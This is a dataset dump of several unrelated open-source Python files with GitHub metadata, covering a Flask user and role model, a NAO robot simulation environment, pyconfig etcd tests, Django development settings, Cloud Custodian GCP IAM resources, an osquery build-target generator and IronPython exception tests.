text stringlengths 4 1.02M | meta dict |
|---|---|
from datetime import datetime
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from markdown import markdown
import bleach
from flask import current_app, request
from flask_login import UserMixin, AnonymousUserMixin
from . import db, login_manager
class Permission:
FOLLOW = 0x01
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMINISTER = 0x80
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'User': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'Moderator': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES |
Permission.MODERATE_COMMENTS, False),
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role %r>' % self.name
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(64), unique=True, index=True)
username = db.Column(db.String(64), unique=True, index=True)
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
password_hash = db.Column(db.String(128))
confirmed = db.Column(db.Boolean, default=False)
name = db.Column(db.String(64))
location = db.Column(db.String(64))
about_me = db.Column(db.Text())
member_since = db.Column(db.DateTime(), default=datetime.utcnow)
last_seen = db.Column(db.DateTime(), default=datetime.utcnow)
avatar_hash = db.Column(db.String(32))
posts = db.relationship('Post', backref='author', lazy='dynamic')
keywords = db.relationship('Keyword', backref='author', lazy='dynamic')
bugtypes = db.relationship('BugType', backref='author', lazy='dynamic')
loganalyzers = db.relationship('LogAnalyzer', backref='author', lazy='dynamic')
@staticmethod
def generate_fake(count=100):
from sqlalchemy.exc import IntegrityError
from random import seed
import forgery_py
seed()
for i in range(count):
u = User(email=forgery_py.internet.email_address(),
username=forgery_py.internet.user_name(True),
password=forgery_py.lorem_ipsum.word(),
confirmed=True,
name=forgery_py.name.full_name(),
location=forgery_py.address.city(),
about_me=forgery_py.lorem_ipsum.sentence(),
member_since=forgery_py.date.date(True))
db.session.add(u)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role is None:
if self.email == current_app.config['FLASKY_ADMIN']:
self.role = Role.query.filter_by(permissions=0xff).first()
if self.role is None:
self.role = Role.query.filter_by(default=True).first()
if self.email is not None and self.avatar_hash is None:
self.avatar_hash = hashlib.md5(
self.email.encode('utf-8')).hexdigest()
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def generate_confirmation_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'confirm': self.id})
def confirm(self, token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('confirm') != self.id:
return False
self.confirmed = True
db.session.add(self)
return True
def generate_reset_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'reset': self.id})
def reset_password(self, token, new_password):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('reset') != self.id:
return False
self.password = new_password
db.session.add(self)
return True
def generate_email_change_token(self, new_email, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'change_email': self.id, 'new_email': new_email})
def change_email(self, token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return False
if data.get('change_email') != self.id:
return False
new_email = data.get('new_email')
if new_email is None:
return False
if self.query.filter_by(email=new_email).first() is not None:
return False
self.email = new_email
self.avatar_hash = hashlib.md5(
self.email.encode('utf-8')).hexdigest()
db.session.add(self)
return True
def can(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_administrator(self):
return self.can(Permission.ADMINISTER)
def ping(self):
self.last_seen = datetime.utcnow()
db.session.add(self)
# http://www.gravatar.com/avatar/63892853e2947e692c0ec0ec17d16864?s=256&d=identicon&r=g
def gravatar(self, size=100, default='identicon', rating='g'):
if request.is_secure:
url = 'https://secure.gravatar.com/avatar'
else:
url = 'http://www.gravatar.com/avatar'
hash = self.avatar_hash or hashlib.md5(
self.email.encode('utf-8')).hexdigest()
return '{url}/{hash}?s={size}&d={default}&r={rating}'.format(
url=url, hash=hash, size=size, default=default, rating=rating)
def __repr__(self):
return '<User %r>' % self.username
class AnonymousUser(AnonymousUserMixin):
def can(self, permissions):
return False
def is_administrator(self):
return False
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Post(db.Model):
__tablename__ = 'posts'
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
body_html = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
@staticmethod
def generate_fake(count=100):
from random import seed, randint
import forgery_py
seed()
user_count = User.query.count()
for i in range(count):
u = User.query.offset(randint(0, user_count - 1)).first()
p = Post(body=forgery_py.lorem_ipsum.sentences(randint(1, 5)),
timestamp=forgery_py.date.date(True),
author=u)
db.session.add(p)
db.session.commit()
@staticmethod
def on_changed_body(target, value, oldvalue, initiator):
allowed_tags = ['a', 'abbr', 'acronym', 'b', 'blockquote', 'code',
'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul',
'h1', 'h2', 'h3', 'p']
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True))
db.event.listen(Post.body, 'set', Post.on_changed_body)
class Keyword(db.Model):
__tablename__ = 'keywords'
id = db.Column(db.Integer, primary_key=True)
kw_regex = db.Column(db.String(128), unique=True, index=True)
description = db.Column(db.String(128))
comment = db.Column(db.String(512))
test_flag = db.Column(db.Boolean, default=False)
color = db.Column(db.Integer)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
bugtype_id = db.Column(db.Integer, db.ForeignKey('bugtypes.id'))
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
class BugType(db.Model):
__tablename__ = 'bugtypes'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128))
description = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
keywords = db.relationship('Keyword', backref='bug_type', lazy='dynamic')
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
class LogAnalyzer(db.Model):
__tablename__ = 'loganalyzers'
id = db.Column(db.Integer, primary_key=True)
ftp_url = db.Column(db.String(140), unique=True, index=True)
title = db.Column(db.String(128))
description = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
bug_id = db.Column(db.Integer)
moc_id = db.Column(db.Integer)
task_id = db.Column(db.Integer)
tv_model = db.Column(db.String(128))
SN_id = db.Column(db.String(128))
log_dir = db.Column(db.String(128))
ftp_dl_ok = db.Column(db.Boolean, default=False)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
bugtype_id = db.Column(db.Integer, db.ForeignKey('bugtypes.id'))
class Customer(db.Model):
__tablename__ = 'customers'
id = db.Column(db.Integer, primary_key=True)
sn = db.Column(db.String(128))
emac = db.Column(db.String(128))
wmac = db.Column(db.String(128))
bmac = db.Column(db.String(128))
addr = db.Column(db.String(128))
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
| {
"content_hash": "2496faea389fc0e64725d33ad4a5fff2",
"timestamp": "",
"source": "github",
"line_count": 296,
"max_line_length": 91,
"avg_line_length": 36.486486486486484,
"alnum_prop": 0.6117592592592592,
"repo_name": "DonYum/LogAna",
"id": "456b2fa9073df33ff17c400cc7dc62f5f19ae4ec",
"size": "10800",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/models.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1190"
},
{
"name": "HTML",
"bytes": "34127"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "144162"
}
],
"symlink_target": ""
} |
from __future__ import division, print_function, absolute_import
import sys
import traceback
import time
import socket
from naoqi import ALProxy
from ..environments import Environment
__all__ = ['NaoEnvFactory', 'PhysicalWorld', 'Webots']
class NaoEnvFactory(object):
"""The NAO environment factory.
An instance of a NAO environment can be created by passing
the environment type.
Notes
-----
Currently only soccer related events are handled by the Nao worlds. To
be more specific the environment attempts to detect whether a goal was
scored. The physical world will prompt the user to reset the experiment
while the supervisor in the Webots world is responsible for resetting
the environment for the next experiment.
Examples
--------
>>> from mlpy.environments.nao import NaoEnvFactory
>>> NaoEnvFactory.create('nao.physicalworld')
This creates a :class:`.PhysicalWorld` instance controlling
agents in the real world.
>>> NaoEnvFactory.create('nao.webots', 12345)
This creates a :class:`.Webots` instance controlling simulated
agents in Webots. The port '12345' is the port the controller of
the supervisor in the Webots world listens to.
"""
@staticmethod
def create(_type, *args, **kwargs):
"""Create a Nao environment of the given type.
Parameters
----------
_type : str
The Nao environment type. Valid environment types:
nao.physicalworld
This controls the robots in the real world. The environment
interacts with the user to inquire about events happening
in the real world. A :class:`PhysicalWorld` instance is created.
nao.webots
This controls the simulated robots in the Webots simulator.
The world in the simulator should include a supervisor using
a controller to handle the required events. A sample controller
can be found in `environments/webots/controllers/serverc`. A
:class:`.Webots` instance is created.
args : tuple, optional
Positional arguments to pass to the class of the given type for
initialization.
kwargs : dict, optional
Non-positional arguments to pass to the class of the given type
for initialization.
Returns
-------
Environment
A Nao environment instance of the given type.
"""
try:
return {
"nao.physicalworld": PhysicalWorld,
"nao.webots": Webots,
}[_type](* args, **kwargs)
except KeyError:
return None
class PhysicalWorld(Environment):
"""The physical (real) environment.
Parameters
----------
agents : Agent or list[Agent], optional
A list of agents that act in the environment.
Notes
-----
The agents are acting in the real world. To capture events happening
in the real world the user is prompted to provide the information.
"""
def __init__(self, agents=None):
super(PhysicalWorld, self).__init__(agents)
def __str__(self):
return "Physical World"
def reset(self, t, **kwargs):
"""Reset the environment and all agents.
The user is prompted to reset the environment (i.e., experiment).
Ones the user has reset the environment all agents are reset.
Parameters
----------
t : float
The current time (sec)
kwargs : dict, optional
Non-positional parameters, optional.
"""
if raw_input("Please reset your experiment. Press ENTER to continue. >>>"):
pass
super(PhysicalWorld, self).reset(t, **kwargs)
# noinspection PyMethodMayBeStatic
def check_data(self, value):
"""Request to check for data.
Parameters
----------
value : str
The request identifier.
Returns
-------
The result returned by the user.
Notes
-----
When checking for data, the user is prompted to provide the
information via the console.
"""
if value == "check goal":
user_input = None
while user_input not in ["0", "1"]:
user_input = raw_input("Goal scored? [\"goal scored\": 1; \"goal missed\": 0] >>> ")
return "success" if user_input == "1" else "fail"
class Webots(Environment):
"""Simulated environment using the Webots simulator.
The Webots environment works in conjunction with a controller
specified for a supervisor. A sample controller can be found in
`webots/controllers/serverc`. This controller listens on port
`12345` for the following events:
request reset
Requests an environment reset from the controller.
check goal
Requests from the controller a check whether a goal
was scored or not. The result of that check is send
back to the client.
Parameters
----------
port : int, optional
The port the controller listens to. If using the environment
in conjunction with controller `serverc` the port number is
`12345`. Default is 12345.
agents : Agent or list[Agent], optional
A list of agents that act in the environment.
Notes
-----
When requested to reset, the environment will request to reset
the simulated environment in Webots from the controller.
It is also possible to check if a goal was scored by calling
the function :meth:`check_data` with the argument 'check goal'.
This sends a request to the controller to check if a goal was
scored.
.. attention::
The Webots environment class requires the `NAOqi <http://doc.aldebaran.com/2-1/index.html>`_
API from Aldebaran be installed on your machine. A separate license is
required for the API.
"""
RECV_BUFFER = 256
def __init__(self, port=12345, agents=None):
super(Webots, self).__init__(agents)
self._modules = ["ALMemory",
"ALMotion",
"ALRobotPosture",
"ALVideoDevice"]
self._port = port
self._sock = None
def __str__(self):
return "Webots Pro version 8.0"
def reset(self, t, **kwargs):
"""Reset the environment and all agents.
A request is send to the controller to reset the
environment. Once the environment is reset all
agents acting in the environment are reset.
Parameters
----------
t : float
The current time (sec)
kwargs : dict, optional
Non-positional parameters, optional.
"""
if self._sock:
self._sock.send("request reset")
done = False
while not done:
try:
data = self._sock.recv(Webots.RECV_BUFFER)
self._log(data)
if data == "reset requested":
time.sleep(5)
self._sock = self._connect()
done = True
except socket.error:
pass
super(Webots, self).reset(t, **kwargs)
def is_complete(self):
"""Checks if the environment has completed.
This is dependent on whether the agent(s) have
completed their task.
Returns
-------
bool
Whether the environment has reached some end goal.
"""
is_complete = super(Webots, self).is_complete()
# TODO: check for pending server requests
return is_complete
def enter(self, t):
"""Enter the environment and all agents.
Parameters
----------
t : float
The current time (sec).
"""
self._sock = self._connect()
super(Webots, self).enter(t)
def exit(self):
"""Exit the environment and all agents.
Perform cleanup tasks here.
"""
super(Webots, self).exit()
if self._sock:
self._sock.close()
def check_data(self, value):
"""Request to check for data.
Parameters
----------
value : str
The request identifier.
Returns
-------
The result returned by the controller.
Notes
-----
The Webots environment works in conjunction with a controller
specified for a supervisor. When checking for data, a request
with the `value` is send to the controller which extracts the
information and returns the results.
"""
self._sock.send(value)
while True:
try:
return self._sock.recv(Webots.RECV_BUFFER)
except socket.error:
pass
def _connect(self):
""" Connects to the server (controller). """
self._log("connecting...")
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
sys.exit(1)
host = socket.gethostname()
connected = False
while not connected:
try:
s.connect((host, self._port))
s.setblocking(0)
while True:
ready = True
for m in self._modules:
# noinspection PyBroadException
try:
for agent in self._agents.itervalues():
ALProxy(m, agent.pip, agent.pport)
except:
ready = False
break
if ready:
break
time.sleep(1)
connected = True
except socket.error:
pass
self._log("connected")
return s
def _log(self, text):
print(str(self) + ": " + text)
| {
"content_hash": "85b3b0f8a9820f1786e05ae2d9c5cd12",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 100,
"avg_line_length": 29.7492795389049,
"alnum_prop": 0.5647583066937906,
"repo_name": "evenmarbles/mlpy",
"id": "a3c6378d56710f14eb1416102b909d34be29aaf5",
"size": "10323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mlpy/environments/nao.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "23432"
},
{
"name": "C++",
"bytes": "128140"
},
{
"name": "Makefile",
"bytes": "1684"
},
{
"name": "Python",
"bytes": "663212"
}
],
"symlink_target": ""
} |
import os
import time
import pytool
from nose import SkipTest
from nose.tools import ok_, eq_
import pyconfig
def setup():
if not pyconfig.etcd().module:
raise SkipTest("etcd not installed")
if not pyconfig.etcd().configured:
raise SkipTest("etcd not configured")
pyconfig.set('pyconfig.etcd.prefix', '/pyconfig_test/test/')
client = pyconfig.etcd().client
client.set('pyconfig_test/test/pyconfig.number', pytool.json.as_json(1))
client.set('pyconfig_test/test/pyconfig.boolean', pytool.json.as_json(True))
client.set('pyconfig_test/test/pyconfig.string', pytool.json.as_json("Value"))
client.set('pyconfig_test/test/pyconfig.json', pytool.json.as_json({"a": "b"}))
client.set('pyconfig_test/test2/pyconfig.number', pytool.json.as_json(2))
client.set('pyconfig_test/test2/config.inherit',
pytool.json.as_json('/pyconfig_test/test/'))
def teardown():
if not pyconfig.etcd().configured:
return
# Clean up the test namespace
pyconfig.etcd().client.delete('pyconfig_test/test', dir=True, recursive=True)
pyconfig.etcd().client.delete('pyconfig_test/test2', dir=True, recursive=True)
pyconfig.etcd().client.delete('pyconfig_test/watching', dir=True, recursive=True)
pyconfig.etcd().client.delete('pyconfig_test/', dir=True, recursive=True)
def test_using_correct_prefix():
eq_(pyconfig.etcd().prefix, '/pyconfig_test/test/')
def test_parse_hosts_single_host():
host = pyconfig.etcd()._parse_hosts('127.0.0.1:2379')
eq_(host, (('127.0.0.1', 2379),))
def test_parse_hosts_multiple_hosts():
hosts = '10.0.0.1:2379,10.0.0.2:2379,10.0.0.3:2379'
hosts = pyconfig.etcd()._parse_hosts(hosts)
eq_(hosts, (('10.0.0.1', 2379), ('10.0.0.2', 2379), ('10.0.0.3', 2379)))
def test_load_works():
conf = pyconfig.etcd().load()
eq_(conf.get('pyconfig.json'), {"a": "b"})
eq_(conf.get('pyconfig.string'), 'Value')
eq_(conf.get('pyconfig.boolean'), True)
eq_(conf.get('pyconfig.number'), 1)
def test_changing_prefix_works():
pyconfig.etcd(prefix='pyconfig/other')
eq_(pyconfig.etcd().prefix, '/pyconfig/other/')
conf = pyconfig.etcd().load()
eq_(conf, {})
pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test')
eq_(pyconfig.etcd().prefix, '/pyconfig_test/test/')
def test_inheritance_works():
pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test2')
conf = pyconfig.etcd().load()
eq_(conf.get('pyconfig.json'), {"a": "b"})
eq_(conf.get('pyconfig.string'), 'Value')
eq_(conf.get('pyconfig.boolean'), True)
eq_(conf.get('pyconfig.number'), 2)
eq_(conf.get('config.inherit'), '/pyconfig_test/test/')
pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test')
def test_reload_work_with_inheritance():
pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test2')
pyconfig.reload()
def test_autoloading_etcd_config_works():
pyconfig.Config().clear()
pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/test2')
pyconfig.reload()
eq_(pyconfig.get('pyconfig.string'), 'Value')
eq_(pyconfig.get('pyconfig.number'), 2)
def test_watching():
# Enable watching
os.environ['PYCONFIG_ETCD_WATCH'] = 'true'
pyconfig.Config().clear()
pyconfig.set('pyconfig.etcd.prefix', 'pyconfig_test/watching')
pyconfig.reload()
# Wait for 20ms before writing to ensure the watcher thread is ready
time.sleep(0.020)
# Write a new value directly to etcd
pyconfig.etcd().client.write('pyconfig_test/watching/it.works',
pytool.json.as_json(True))
# Try to get the value... this is a bit sloppy but good luck doing
# something better
retry = 50
while retry:
retry -= 1
if pyconfig.get('it.works', None) is not None:
break
# Wait 20ms more for it to show up
time.sleep(0.020)
eq_(pyconfig.get('it.works', False), True)
# TODO:
# - Add tests for protocol environment variable
def test_protocol_is_picked_up_and_used():
raise SkipTest("TODO")
# - Add tests for auth environment variable
def test_auth_is_picked_up_and_used():
raise SkipTest("TODO")
| {
"content_hash": "0cda3984d95c19b2b2a835276fea1f42",
"timestamp": "",
"source": "github",
"line_count": 132,
"max_line_length": 85,
"avg_line_length": 31.636363636363637,
"alnum_prop": 0.6592432950191571,
"repo_name": "shakefu/pyconfig",
"id": "1b8e97433cb4bf0afdaba6add177560c2bac94f2",
"size": "4176",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_etcd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "49077"
}
],
"symlink_target": ""
} |
'''
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env("DJANGO_SECRET_KEY", default='#18+!)v+luhb)3ds8mnbxdg0a=#mam#azum8db5#ub)3c_p9rw')
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
},
"file_resubmit": {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
"LOCATION": '/tmp/file_resubmit/'
},
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ('127.0.0.1', '10.0.2.2',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', 'wagtail.contrib.styleguide',)
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
WAGTAILSEARCH_BACKENDS = {
'default': {
'BACKEND': 'wagtail.search.backends.db',
}
} | {
"content_hash": "52110936c0f1a4d658d1b86de764fe0e",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 99,
"avg_line_length": 30.234375,
"alnum_prop": 0.5074935400516796,
"repo_name": "bruecksen/isimip",
"id": "689251e52e8b68b139aeb165ea37551fa23b0e9a",
"size": "1959",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "config/settings/development.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "36731"
},
{
"name": "HTML",
"bytes": "106877"
},
{
"name": "JavaScript",
"bytes": "30564"
},
{
"name": "Python",
"bytes": "4244200"
},
{
"name": "Shell",
"bytes": "789"
}
],
"symlink_target": ""
} |
from c7n_gcp.provider import resources
from c7n_gcp.query import QueryResourceManager, TypeInfo
@resources.register('project-role')
class ProjectRole(QueryResourceManager):
"""GCP Project Role
https://cloud.google.com/iam/docs/reference/rest/v1/organizations.roles#Role
"""
class resource_type(TypeInfo):
service = 'iam'
version = 'v1'
component = 'projects.roles'
enum_spec = ('list', 'roles[]', None)
scope = 'project'
scope_key = 'parent'
scope_template = 'projects/{}'
name = id = "name"
default_report_fields = ['name', 'title', 'description', 'stage', 'deleted']
asset_type = "iam.googleapis.com/Role"
@staticmethod
def get(client, resource_info):
return client.execute_query(
'get', verb_arguments={
'name': 'projects/{}/roles/{}'.format(
resource_info['project_id'],
resource_info['role_name'].rsplit('/', 1)[-1])})
@resources.register('service-account')
class ServiceAccount(QueryResourceManager):
class resource_type(TypeInfo):
service = 'iam'
version = 'v1'
component = 'projects.serviceAccounts'
enum_spec = ('list', 'accounts[]', [])
scope = 'project'
scope_key = 'name'
scope_template = 'projects/{}'
id = "name"
name = 'email'
default_report_fields = ['name', 'displayName', 'email', 'description', 'disabled']
asset_type = "iam.googleapis.com/ServiceAccount"
@staticmethod
def get(client, resource_info):
return client.execute_query(
'get', verb_arguments={
'name': 'projects/{}/serviceAccounts/{}'.format(
resource_info['project_id'],
resource_info['email_id'])})
@resources.register('iam-role')
class Role(QueryResourceManager):
"""GCP Organization Role
https://cloud.google.com/iam/docs/reference/rest/v1/organizations.roles#Role
"""
class resource_type(TypeInfo):
service = 'iam'
version = 'v1'
component = 'roles'
enum_spec = ('list', 'roles[]', None)
scope = "global"
name = id = "name"
default_report_fields = ['name', 'title', 'description', 'stage', 'deleted']
asset_type = "iam.googleapis.com/Role"
@staticmethod
def get(client, resource_info):
return client.execute_command(
'get', {
'name': 'roles/{}'.format(
resource_info['name'])})
| {
"content_hash": "611b4e6ad255ec9704011cbc2e087d3c",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 91,
"avg_line_length": 34.9078947368421,
"alnum_prop": 0.5571051639653223,
"repo_name": "capitalone/cloud-custodian",
"id": "c990dd2aa256ad6e8baaae48cafbefee57cb3c96",
"size": "2781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/c7n_gcp/c7n_gcp/resources/iam.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2190"
},
{
"name": "Go",
"bytes": "135995"
},
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "9378"
},
{
"name": "Python",
"bytes": "3693572"
},
{
"name": "Shell",
"bytes": "2294"
}
],
"symlink_target": ""
} |
import argparse
import json
import logging
import os
logging_format = '[%(levelname)s] %(message)s'
logging.basicConfig(level=logging.INFO, format=logging_format)
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
REPO_ROOT_DIR = os.path.realpath(os.path.join(SCRIPT_DIR, "../.."))
def get_files_to_compile(json_data):
files_to_compile = []
for element in json_data:
filename = element["file"]
if not filename.endswith("tests.cpp") and \
not filename.endswith("benchmarks.cpp") and \
"third-party" not in filename and \
"example" not in filename and \
"generated/gen" not in filename and \
"test_util" not in filename:
base = filename.rfind("osquery/")
filename = filename[base + len("osquery/"):]
base_generated = filename.rfind("generated/")
if base_generated >= 0:
filename = filename[base_generated:]
files_to_compile.append(filename)
return files_to_compile
TARGETS_PREAMBLE = """
# DO NOT EDIT
# Automatically generated: make sync
thrift_library(
name="if",
languages=[
"cpp",
"py",
],
py_base_module="osquery",
thrift_srcs={
"extensions.thrift": ["Extension", "ExtensionManager"],
},
)
cpp_library(
name="osquery_sdk",
headers=AutoHeaders.RECURSIVE_GLOB,
link_whole=True,
srcs=["""
TARGETS_POSTSCRIPT = """ ],
deps=[
"@/thrift/lib/cpp/concurrency:concurrency",
"@/rocksdb:rocksdb",
":if-cpp",
],
external_deps=[
"boost",
"glog",
"gflags",
"gtest",
("e2fsprogs", None, "uuid"),
],
compiler_flags=[
"-Wno-unused-function",
"-Wno-non-virtual-dtor",
"-Wno-address",
"-Wno-overloaded-virtual",
"-DOSQUERY_BUILD_PLATFORM=centos7",
"-DOSQUERY_BUILD_DISTRO=centos7",
"-DOSQUERY_PLATFORM_MASK=9",
"-DOSQUERY_THRIFT_LIB=thrift/lib/cpp",
"-DOSQUERY_THRIFT_SERVER_LIB=thrift/lib/cpp/server/example",
"-DOSQUERY_THRIFT_POINTER=std",
"-DOSQUERY_THRIFT=osquery/gen-cpp/",
],
propagated_pp_flags=[
"-DOSQUERY_BUILD_VERSION=%s",
"-DOSQUERY_BUILD_SDK_VERSION=%s",
"-DOSQUERY_BUILD_PLATFORM=centos",
"-DOSQUERY_BUILD_DISTRO=centos7",
"-DOSQUERY_PLATFORM_MASK=9",
]
)
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=(
"Generate a TARGETS files from CMake metadata"
))
parser.add_argument("--input", "-i", required=True)
parser.add_argument("--version", "-v", required=True)
parser.add_argument("--sdk", required=True)
args = parser.parse_args()
try:
with open(args.input, "r") as f:
try:
json_data = json.loads(f.read())
except ValueError:
logging.critical("Error: %s is not valid JSON" % args.input)
source_files = get_files_to_compile(json_data)
print(TARGETS_PREAMBLE)
for source_file in source_files:
print(" \"%s\"," % source_file)
print(TARGETS_POSTSCRIPT % (args.version, args.sdk))
except IOError:
logging.critical("Error: %s doesn't exist" % args.input)
| {
"content_hash": "467d4e0b46febc82256be4d6e4277e9c",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 76,
"avg_line_length": 28.607142857142858,
"alnum_prop": 0.599250936329588,
"repo_name": "tburgin/osquery",
"id": "0d36bf7507ceb5dc5510cc05e6f16245107c6e30",
"size": "3227",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tools/codegen/gentargets.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "37970"
},
{
"name": "C++",
"bytes": "1429433"
},
{
"name": "CMake",
"bytes": "72803"
},
{
"name": "Makefile",
"bytes": "3468"
},
{
"name": "Objective-C++",
"bytes": "51002"
},
{
"name": "Shell",
"bytes": "2030"
},
{
"name": "Thrift",
"bytes": "2879"
}
],
"symlink_target": ""
} |
from Foundation import *
from PyObjCTools import Conversion
def myNewParser(result):
tempResult = NSString.alloc().initWithString_(unicode(result))
print tempResult
resultDict = tempResult.nsstring().propertyListFromStringsFileFormat()
return Conversion.pythonCollectionFromPropertyList(resultDict)
| {
"content_hash": "60a85f74f7eec31a711f5754ae35dfcf",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 74,
"avg_line_length": 35.22222222222222,
"alnum_prop": 0.804416403785489,
"repo_name": "jweede/pyxg",
"id": "adb21d079ea907c6e76e83f8c29eaca4c605c2aa",
"size": "317",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sandbox/sandbox.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from iptest.assert_util import *
from iptest.warning_util import warning_trapper
import sys
AreEqual(sys.exc_info(), (None, None, None))
def test_exception_line_no_with_finally():
def f():
try:
raise Exception() # this line should correspond w/ the number below
finally:
pass
try:
f()
except Exception, e:
tb = sys.exc_info()[2]
expected = [25, 30]
while tb:
AreEqual(tb.tb_lineno, expected.pop()) # adding lines will require an update here
tb = tb.tb_next
if is_cli or is_silverlight:
def test_system_exception():
import System
def RaiseSystemException():
raise System.SystemException()
AssertError(SystemError, RaiseSystemException)
AreEqual(sys.exc_info(), (None, None, None))
if is_cli or is_silverlight:
def test_raise():
try:
Fail("Message")
except AssertionError, e:
AreEqual(e.__str__(), e.args[0])
else:
Fail("Expected exception")
def test_finally_continue_fails():
t = '''
try:
pass
finally:
continue
'''
try:
compile(t, '<test>', 'exec')
Fail("Should raise SyntaxError")
except SyntaxError:
pass
def test_finally_continue_in_loop_allowed():
t = '''
try:
pass
finally:
for i in range(1):
continue
'''
try:
compile(t, '<test>', 'exec')
except SyntaxError:
Fail("Should not raise SyntaxError")
